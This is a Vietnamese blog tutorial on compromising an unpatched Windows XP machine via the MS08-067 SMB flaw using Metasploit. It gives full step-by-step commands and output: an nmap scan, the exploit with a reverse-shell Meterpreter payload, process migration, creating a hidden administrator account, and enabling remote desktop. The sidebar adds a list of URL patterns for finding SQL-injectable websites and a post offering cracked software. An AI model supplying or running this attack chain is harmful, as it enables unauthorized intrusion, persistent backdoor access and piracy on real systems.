Chuyển đến nội dung chính

[TUT] Khai thác và remote desktop window XP qua ms08_067_netapi

[TUT] Khai thác và remote desktop window XP qua ms08_067_netapi
Thử làm một cái tut về metasploit :) Do mình vẫn đang học nên có gì sai sót anh em PM để mình chỉnh lại nha :)
Đầu tiên, target phải chạy window XP và không cập nhật bản vá nào cho lỗi trên (có thể khai thác thử, nếu không được có khả năng là đã cập nhật).
Các bước làm như sau (em ghét quay video lắm) với giả sử mục tiêu là nội bộ trong mạng:
Attacker IP: 192.168.1.112 (OS: Kali/Backtrack)
Victim IP: 192.168.1.128 (OS: WIndowXP, port 445 open)
Bước 1: Scan để kiểm tra mục tiêu (TERMINAL 1)
root@bt ~> nmap 192.168.1.128 -p 445
Nếu thấy là 445 open Microsoft -ds gì đó là ngon rồi :)….
Bước 2: Khai thác (TERMINAL 2) – chữ xanh là giải thích nha
msfconsole (vào công cụ metasploit)
msf> use windows/smb/ms08_067_netapi   (dùng exploit ms08_067_netapi)
msf(ms08_067_netapi) > set RHOST 192.168.1.128 (cái này là IP của victim)
msf(ms08_067_netapi) > set LHOST 192.168.1.112  (cái này là IP của mình, sử dụng ifconfig để biết nha)
msf(ms08_067_netapi) > set PAYLOAD windows/meterpreter/revese_tcp (cái này có thể xem là một con trojan vì nó sẽ mở cửa máy victim và connect với mình)
msf(ms08_067_netapi) > exploit (sau khi set xong các tùy chọn thì giờ thực hiện khai thác)
(Mấy cái thông báo là quá trình khai thác thôi, mình tự nhớ lại nên không chính xác lắm nha)
[*] Started reverse handler on 192.168.1.112:4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 3 – lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (749056 bytes) to 192.168.1.128
[*] Meterpreter session 1 opened (192.168.1.112:4444 -> 192.168.1.128:1472)
(Khi xuất hiện được meterpreter> là khai thác thành công :D )
meterpreter> ps (Liệt kê danh sách process…ở đây mình chỉ quan tâm tới process nào được thực thi dưới quyền Administrator để “di trú” sang đó)
147 1 explorer.exe windows/Administrator
meterpreter> migrate 147 (Di trú sang process explorer.exe…Muốn thấy được sự khác nhau thì hãy sử dụng lên getuid trước và sau lệnh này nhé :P )
migration successfully
meterpreter> net user rain sos /add (Tạo user rain với password sos, chú ý, chỉ có thể tạo khi di trú sang process có quyền Administrator hoặc con reverse_tcp đang chạy dưới quyền Administrator)
Command completed successfully!
meterpreter> net localgroup administrators rain /add (Thêm vào group administrators thôi)
Command completed successfully!
meterpreter> run getgui -e (Enable remote desktop)
Tới đây là coi như ngon rồi đấy, giờ chỉ remote vào xem thôi ^_^
Bước 3: Remote Desktop (TERMINAL 1 đi, nãy chạy nmap đó)
root@bt ~> rdesktop 192.168.1.128 (IP của victim nha)
Xong nhập username/password: rain/sos :)
Xin cám ơn! Nếu được nhiệt liệt hưởng ứng, chúng ta có thể cùng học metasploit :)
Note: bài viết được viết theo trí nhớ của hôm offline CEH-Việt :) Có gì thắc mắc cứ vào ceh.vn nha :)
Hãy gửi bài bạn cảm thấy hay về email: jo3ght@gmail.com

Nhận xét

Bài đăng phổ biến từ blog này

Free 2000 Drok Tìm Kiếm Website lỗi SQLi

index.php?id= trainers.php?id= buy.php?category= article.php?ID= play_old.php?id= declaration_more.php?decl_id= pageid= games.php?id= page.php?file= newsDetail.php?id= gallery.php?id= show.php?id= staff_id= newsitem.php?num= readnews.php?id= top10.php?cat= historialeer.php?num= reagir.php?num= Stray-Questions-View.php?num= forum_bds.php?num= game.php?id= view_product.php?id= newsone.php?id= sw_comment.php?id= news.php?id= avd_start.php?avd= event.php?id= product-item.php?id= sql.php?id= news_view.php?id= select_biblio.php?id= humor.php?id= aboutbook.php?id= ogl_inet.php?ogl_id= fiche_spectacle.php?id= communique_detail.php?id= sem.php3?id= kategorie.php4?id= faq2.php?id= show_an.php?id= preview.php?id= loadpsb.php?id= opinions.php?id= spr.php?id= pages.php?id= announce.php?id= clanek.php4?id= participant.php?id= download.php?id= main.php?id= review.php?id= chappies.php?id= read.php?id= prod_detail.php?id= viewphoto.php?id= person.php?id= productinfo.php?id= showimg.php?id= view.php?id=...

Foxit Phantom 2.2.4.0225 full key- đọc, chỉnh sửa và in file PDF

Foxit Phantom là phần mềm cực nhẹ, cực chuyên nghiệp trong việc đọc, chỉnh sửa và in file PDF. Bạn có thể tùy chỉnh mọi thứ trong file PDF giống như word vậy. Mình sẽ share với các bạn bản cài đặt mới nhất 2.2.4.0225 và đặc biệt là có file key cho các bạn dùng, các bạn ko phải lo đến vấn đề tìm crack nữa. Link download :  http://www.mediafire.com/?6u2vnjvfcsvorca  https://drive.google.com/file/d/1ZLtZ1Uqd9Z4oU-LCVcbGMITTEnw_W-kH/view?usp=sharing https://www.fshare.vn/file/T9JNEO1QDDH1

Windows 7 (32 & 64 Bit) Ultimate Lite- Nhanh, Mượt, Nhẹ by Ivankehayov - Rebuild by Lehait [GHO, TIB, ISO]

Nếu đã dùng qua ghost của mình chắc các bạn đã biết đến bản Win 7 Lite Autumn. Hôm nay mình sẽ giới thiệu đến các bạn bộ Win 7 Lite gốc mà mình dùng để làm bản Lite Autumn đó. Mặc dù đã lâu rồi nhưng mình test vẫn không bản nào hơn bản này nên hôm nay quyết định rebuild tối ưu thêm và chia sẻ với các bạn. Rebuild từ bộ Windows 7 Lite của Ivankehayov đã lược bỏ những thành phần không cần thiết. Tối ưu service, registry,.... để windows chạy mượt hơn. Đây là dạng windows setup nên sẽ không kèm bất cứ thành phần nào Không @ctive windows, các bạn dùng Mã hoặc tải tool @ctive tại đây Đây là bản windows lite nên các bạn hãy chuẩn bị driver hoặc bộ driver trước khi cài đặt DOWNLOAD GHO X86 :  https://www.fshare.vn/file/2DCCGWWJPP7I    or Link tốc độ cao GHO X64 :  http://www.fshare.vn/file/T2J8AH9IL5NL  or Link tốc độ cao ISO X86: h ttps://www.fshare.vn/file/EDDJAJJVHHQY ISO  X64:  https://www.fshare.vn/file/YQKAH8HHNJIM TIB:...